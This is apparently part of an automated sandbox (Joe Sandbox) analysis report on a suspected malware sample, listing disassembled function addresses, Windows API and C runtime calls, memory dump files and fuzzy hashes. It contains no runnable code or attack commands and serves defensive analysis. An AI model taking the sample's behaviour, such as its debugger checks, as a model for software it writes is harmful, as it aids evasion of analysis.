Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Function 2F55F130 Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 2F55F1AE

Memory Dump Source

Source File: 00000003.00000002.1984979216.000000002F550000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f550000_nhpoymuP.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: dc8a24d034ad5431fdc5bf45e096fc780db9dc3c0af3441c17c867db6a560d76
Instruction ID: d638ea3f9694e33d0d589a701549dadc81284dc5491b1e11cf4f06849d6e8779
Opcode Fuzzy Hash: dc8a24d034ad5431fdc5bf45e096fc780db9dc3c0af3441c17c867db6a560d76
Instruction Fuzzy Hash: 2F3198B5D012589FCF14CFA9D980A9EFBF4EB49310F10942AE814B7210C775A941CFA8

Function 2F28D578 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1983476244.000000002F28D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F28D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f28d000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77284b58d3e70cd077cb6cdb3fa72b6f943d1b41f2eacd4849ff8caf862a3a16
Instruction ID: 8cd92e83472eaaed61c7c71ed62f1d193f10466fda43b4d3651d144dcbdebf63
Opcode Fuzzy Hash: 77284b58d3e70cd077cb6cdb3fa72b6f943d1b41f2eacd4849ff8caf862a3a16
Instruction Fuzzy Hash: E921F171904204DFDB05DF14EAC0F06BFA5EF99314F648669D90A0A29AC33AE85AC6B1

Function 2F28D573 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1983476244.000000002F28D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F28D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f28d000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
Instruction ID: 93482e01bbd4f5bdbb014340da9d72adbbe846676d908f33da01c39f2b110417
Opcode Fuzzy Hash: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
Instruction Fuzzy Hash: A611AF76904284CFCB06CF10D9C4B06BF72FF95314F28C5A9D90A0B256C336E55ACBA1

Function 2F28D007 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1983476244.000000002F28D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F28D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f28d000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07b0940dc75513750d50bdec8ca257d9e346ae97f4c13e5a8dd87062d588b827
Instruction ID: c5b32e3e356c574b379a1952daa20c5aadbf78e86b3fa93adce4ed6b43282141
Opcode Fuzzy Hash: 07b0940dc75513750d50bdec8ca257d9e346ae97f4c13e5a8dd87062d588b827
Instruction Fuzzy Hash: 85014C6244D3C09FD7024B258C94752BFB8EF43224F1984DBE9898F1E7C2695C49CB72

Function 2F28D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1983476244.000000002F28D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F28D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f28d000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21a7fb215db7cb79046e35c4bd1221701e260969ceb0f7e0bd2b1d756c1bf060
Instruction ID: bd790624ba1e7ad681a34c2294d2f53a333ad3a1c7ca6cf62bbc78a3de6436c9
Opcode Fuzzy Hash: 21a7fb215db7cb79046e35c4bd1221701e260969ceb0f7e0bd2b1d756c1bf060
Instruction Fuzzy Hash: FB0126714083049AE7008B26CD80B57BFD8EF42364F08C52AED094F2C6C379E949CAB2

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000003.00000002.1965140113.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1965140113.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1965140113.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000003.00000002.1965140113.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1965140113.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1965140113.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 00000003.00000002.1965140113.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1965140113.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1965140113.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Function 2F55DC80 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1984979216.000000002F550000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f550000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 104c03c1ceea699a069115afba0027bd5077e4b8b1ca845666d461fce8c669a6
Instruction ID: 2326ac392a579b50bdea41beea691b211d83ce2ad3b27ecb41bcc095d4a4cf87
Opcode Fuzzy Hash: 104c03c1ceea699a069115afba0027bd5077e4b8b1ca845666d461fce8c669a6
Instruction Fuzzy Hash: 8141EDB5D043489FDB04DFA9C884A9EBBF1FB09300F20912AE819BB254D774A985CF85

Function 3250BFD4 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8ae61139deb9e286a3db3a47ed72533df370364ba3f3d5a397c7d73766e438
Instruction ID: a6ceaa129d6264e9e5b0abbfec1b0a288263338270e311e9c1699c947ed39493
Opcode Fuzzy Hash: db8ae61139deb9e286a3db3a47ed72533df370364ba3f3d5a397c7d73766e438
Instruction Fuzzy Hash: 3D215EB8D04219DFDB04CFA9D8849DDBBF1BB4A310F14A16AE815B7360D7349941CF58

Function 3250BFE0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa52ad0baaea175d980cf5122b11c9c1c92290aca9ffa1a655b0519347b20845
Instruction ID: 9a8051d977a937cdf1689f2dfcad6e34c3ae9e3860a6bcdeea6917de7c0b2c5b
Opcode Fuzzy Hash: aa52ad0baaea175d980cf5122b11c9c1c92290aca9ffa1a655b0519347b20845
Instruction Fuzzy Hash: 85213DB8D04219DFDB04DFA9D8849ADFBF1BB4A310F14A16AE815B7360D7349941CF58

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

EntryPoint.NHPOYMUP(80070057), ref: 004017EE

Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030

EntryPoint.NHPOYMUP(80070057), ref: 00401800
EntryPoint.NHPOYMUP(80070057), ref: 00401813
__recalloc.LIBCMT ref: 00401828
EntryPoint.NHPOYMUP(8007000E), ref: 00401839
EntryPoint.NHPOYMUP(8007000E), ref: 00401853
_calloc.LIBCMT ref: 00401861

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
String ID:
API String ID: 1721462702-0
Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(00422910), ref: 00414050

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMON

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
